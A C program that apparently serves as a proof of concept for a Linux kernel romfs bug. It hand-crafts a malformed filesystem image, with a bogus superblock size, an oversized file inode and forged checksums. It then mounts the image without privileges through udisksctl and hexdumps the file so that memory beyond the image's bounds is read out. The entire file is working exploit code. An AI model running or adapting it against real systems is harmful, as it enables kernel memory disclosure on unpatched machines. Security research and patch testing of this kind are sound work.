#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <stdint.h>
#include <err.h>
#include <fcntl.h>
#include <unistd.h>
#include <endian.h>
#include <sys/mman.h>
#include <linux/types.h>

#define ROMFH_DIR 1
#define ROMFH_REG 2

#define ROMFH_EXEC 8

struct romfs_super_block {
  char ident[8];
  __be32 size;
  __be32 checksum;
  char name[16];
};

struct romfs_inode {
  __be32 next;
  __be32 spec;
  __be32 size;
  __be32 checksum;
  char name[16];
  char data[0];
};

#define IMGSIZE 0x1000
#define BOGUS_SIZE (sizeof(struct romfs_super_block)+2*sizeof(struct romfs_inode)+1)

uint32_t wonky_checksum(void *ptr, int len) {
  len = (len & ~3);

  uint32_t sum = 0;
  for (int i=0; i<len; i+=4) {
    uint32_t be_val;
    memcpy(&be_val, ptr+i, 4);
    sum += be32toh(be_val);
  }
  return htobe32(-sum);
}

int main(void) {
  //printf("loading romfs module (this is expected to throw a permission denial message)...\n");
  //system("unshare -mUr mount -t romfs none /");

  printf("creating romfs image...\n");

  int fd = open("romfs.img", O_RDWR|O_CREAT|O_TRUNC, 0600);
  if (fd == -1) err(1, "create romfs.img");
  if (ftruncate(fd, IMGSIZE)) err(1, "truncate img");
  char *map = mmap(NULL, IMGSIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
  if (map == MAP_FAILED) err(1, "mmap");

  struct romfs_super_block *sb = (void*)map;
  memcpy(sb->ident, "-rom1fs-", 8);
  sb->size = htobe32(BOGUS_SIZE);
  sb->checksum = 0; /* TBD */
  memcpy(sb->name, "0123456789abcde\0", 16);

  struct romfs_inode *root_inode = (void*)(map + sizeof(struct romfs_super_block));
  struct romfs_inode *file_inode = root_inode + 1;

  root_inode->next = htobe32(0 | ROMFH_DIR | ROMFH_EXEC);
  root_inode->spec = htobe32((char*)file_inode - map);
  root_inode->size = 0;
  root_inode->checksum = 0; /* TBD */
  memcpy(root_inode->name, "foobar\0\0\0\0\0\0\0\0\0\0", 16);
  root_inode->checksum = wonky_checksum(root_inode, sizeof(root_inode));

  file_inode->next = htobe32(0 | ROMFH_REG);
  file_inode->spec = 0;
  file_inode->size = htobe32(0x1000);
  file_inode->checksum = 0; /* TBD */
  memcpy(file_inode->name, "foobar\0\0\0\0\0\0\0\0\0\0", 16);
  file_inode->data[0] = 'X';
  file_inode->checksum = wonky_checksum(file_inode, sizeof(file_inode));

  sb->checksum = wonky_checksum(map, BOGUS_SIZE);

  munmap(map, IMGSIZE);
  close(fd);

  printf("creating loop device...\n");
  system("udisksctl loop-setup -f romfs.img");
  printf("mounting loop device...\n");
  system("udisksctl mount -b /dev/disk/by-label/0123456789abcde");

  printf("testing access...\n");
  system("ls -la /media/$USER/0123456789abcde");

  printf("dumping file contents...\n");
  system("hexdump -C /media/$USER/0123456789abcde/foobar");

  printf("removing mount...\n");
  system("udisksctl unmount -b /dev/disk/by-label/0123456789abcde");
  printf("tearing down loop device...\n");
  system("udisksctl loop-delete -b /dev/disk/by-label/0123456789abcde");
}
